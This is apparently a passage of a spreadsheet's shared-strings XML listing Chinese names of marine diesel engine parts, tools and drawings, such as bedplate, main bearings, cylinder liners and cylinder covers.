  <si>
    <t xml:space="preserve">飞轮下端侧板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮下端1号拱肋                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮下端2号拱肋                                          </t>
  </si>
  <si>
    <t xml:space="preserve">焊接机座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">发电机下端板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管底部                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分离器吸入管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后挡板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">起吊装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥-减振底板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液位开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">基座螺栓安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹力垫粘合剂                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢                                                </t>
  </si>
  <si>
    <t xml:space="preserve">油位                                                </t>
  </si>
  <si>
    <t xml:space="preserve">发电机机座要求                                           </t>
  </si>
  <si>
    <t xml:space="preserve">粘合剂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">基座公差                                              </t>
  </si>
  <si>
    <t xml:space="preserve">跟进表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">导向工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承滑轮螺柱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">金属丝夹紧                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦定位工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦拆卸工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承盖提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承桥规                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器拧紧模板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔机轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">木箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">上壳体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">下壳体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">基板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承上的白合金                                         </t>
  </si>
  <si>
    <t xml:space="preserve">说明图纸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">加热线圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">固定                                                </t>
  </si>
  <si>
    <t xml:space="preserve">磁性过滤器模板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">磁性过滤器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">探测进度表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底座焊接程序                                            </t>
  </si>
  <si>
    <t xml:space="preserve">装配说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扁钢棒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">模板加工                                              </t>
  </si>
  <si>
    <t xml:space="preserve">模板焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">放置基座上样板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液位报警管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">键                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">I-剖面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">基座加工                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油盘表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滴水盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钢制减振器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹性安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆盘                                                </t>
  </si>
  <si>
    <t xml:space="preserve">基座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">基准面报警管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">基架总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">楔                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">锁片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">螺母                                                </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机座焊接截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">找中螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底座焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油吸入管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮下1号拱肋                                           </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮下2号拱肋                                           </t>
  </si>
  <si>
    <t xml:space="preserve">量油计固定物                                            </t>
  </si>
  <si>
    <t xml:space="preserve">底座加工截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓                                                </t>
  </si>
  <si>
    <t xml:space="preserve">防护盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油盘加工                                              </t>
  </si>
  <si>
    <t xml:space="preserve">填料块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机下端主夹板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">挡板后部下端拱肋                                          </t>
  </si>
  <si>
    <t xml:space="preserve">六角头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">垫圈                                                </t>
  </si>
  <si>
    <t xml:space="preserve">IMO板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">标尺                                                </t>
  </si>
  <si>
    <t xml:space="preserve">打孔板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">1-1/4接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后盖板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">圆锥形减振器安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">基座栏杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量油计手柄                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架截面前端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">A形机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底架前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底架后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中间架前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间架后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">后端钻孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架详图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机架切面图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓套管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">支撑法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导轨                                                </t>
  </si>
  <si>
    <t xml:space="preserve">耐磨环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铰链                                                </t>
  </si>
  <si>
    <t xml:space="preserve">铰链杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架桁材                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">导向板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">门框                                                </t>
  </si>
  <si>
    <t xml:space="preserve">集油器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">门                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">中间板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分离板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">三角管板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吊板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">衬片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓-上端部件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓-下端部件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">备用螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">装配螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">护盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓详图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导向衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑螺栓机架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱中部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱截面图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">端罩                                                </t>
  </si>
  <si>
    <t xml:space="preserve">切割图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">通风管-活塞冷却油                                         </t>
  </si>
  <si>
    <t xml:space="preserve">防护装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支撑螺栓套筒                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保护管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱详细资料                                           </t>
  </si>
  <si>
    <t xml:space="preserve">？？                                                </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖上端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖下端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承上瓦                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承下瓦                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖栓键                                            </t>
  </si>
  <si>
    <t xml:space="preserve">护盖-上端零件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">护盖-下端零件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺栓用螺母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扩展槽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖-总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架顶视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺钉                                                </t>
  </si>
  <si>
    <t xml:space="preserve">可调定距管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">前后端防护                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保护板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力垫圈零件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">热敏元件安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">热敏元件缆管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接线盒                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管接头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">磨损环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承-锡铝合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承.铅青铜合金                                         </t>
  </si>
  <si>
    <t xml:space="preserve">安全块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架底部&amp;后侧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮端盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气室盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水喷管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护盖零件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">集泥器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">导流筒/主轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">加工单元导板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调整垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">加工单元导向螺钉                                          </t>
  </si>
  <si>
    <t xml:space="preserve">加工支架操纵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓铭牌                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸曲柄箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">非加工气缸曲柄箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架&amp;曲柄箱总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测量草图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">修理方法                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导向螺丝                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">水报警气缸套螺钉                                          </t>
  </si>
  <si>
    <t xml:space="preserve">水报警气缸套管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支撑螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">环                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">安全衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保护帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架顶部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架底部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架侧边                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架后侧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架截面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架连接轴反侧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架联结轴侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力垫圈环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推垫圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">磨擦环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支撑联轴节侧上端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">安全螺栓粘合                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盖密封                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑联轴节侧下端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">Penn锁紧环                                           </t>
  </si>
  <si>
    <t xml:space="preserve">止推垫圈零件图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">导向销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">夹圈                                                </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱上部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链轮机架下部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间冷却水套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖-凸轮轴                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴承箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防护-上部件-前端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">防护-下部件-前端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">防护-上部件-后端                                         </t>
  </si>
  <si>
    <t xml:space="preserve">顶条                                                </t>
  </si>
  <si>
    <t xml:space="preserve">中间防护机架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">盖                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">观测盖板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">端盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">支撑环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶部防护                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部防护罩                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴防护                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油分离器箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">警告板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架防护                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铭牌.主轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环-上端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环-下端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油封盖-上端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油封盖-下端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">甩油环-橡胶                                            </t>
  </si>
  <si>
    <t xml:space="preserve">上防护装置前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">下防护装置前端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上防护装置后端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">顶带                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机架门                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架门-前端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架门-后端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">护盖.前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护盖.后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护盖.上端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护盖.下端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保护垫圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">护盖上端.加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">护盖下端.加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接-防护                                             </t>
  </si>
  <si>
    <t xml:space="preserve">下部防护件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮驱动器盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">合成橡胶软管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">清洁盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防护端前部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">上盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">下盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">末端防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防护装置上部零件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">防护装置下部零件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封圈的安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间防护装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后侧盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">降噪和降温的装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">降噪和降温盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">装配块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套-中部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸套边缘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套-上部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套-下部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞清洁环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气带Y56F                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖垫片                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">衬套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">燃烧环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">侧壁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">肋板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">止动块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">面                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">端壁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体密封                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封圈槽                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">端部保护                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套-上部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套缸套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水连接管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水套支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体/冷却水套备件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧导板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">缸套管子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">夹钳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">O形环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体修理                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸套提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">珩磨工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸套半轴环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">研磨环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔工具.螺纹.衬套                                        </t>
  </si>
  <si>
    <r>
      <t>倾斜上升螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">定位销取出器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">填料函孔盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套温度测量点                                          </t>
  </si>
  <si>
    <t xml:space="preserve">阶梯环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套拆卸高度                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">水导套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸环-Y56                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖-底部零件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">密封圈-气缸盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">挡热板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却罩-上端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却罩-下端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀防护装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖机架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖防护装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">螺杆.支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器套筒                                             </t>
  </si>
  <si>
    <t xml:space="preserve">衬套.燃油阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保护轴衬                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带O形环衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">防护环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧套.燃油阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓.燃油阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓.燃汽油阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">法兰.燃油阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">衬套.起动阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">衬套.安全阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带O形圈套筒                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒-起动阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧套.起动阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀螺柱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺杆-起动阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒                                                </t>
  </si>
  <si>
    <t xml:space="preserve">衬套总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧套.安全阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">衬套.示功阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧套.示功器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气管路管子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吸入阀座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中心螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中心螺钉用螺母                                           </t>
  </si>
  <si>
    <t xml:space="preserve">O形圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀座环-排气                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓.支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上端零件-顶视图                                       </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱-起动阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖顶视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖顶部.后侧                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸台气阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀座砂轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀座砂轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">装配工具杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冲洗阀座拆卸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冲洗阀座安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">液压上紧工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">量规                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧测量-气缸盖螺母                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压环冲击板手                                           </t>
  </si>
  <si>
    <t xml:space="preserve">研磨轮-排气阀座                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖提升外部螺柱                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压.紧固环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">端面板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀座环安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖维修方案                                           </t>
  </si>
  <si>
    <t xml:space="preserve">备用零件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖防护                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱-喷油器                                            </t>
  </si>
  <si>
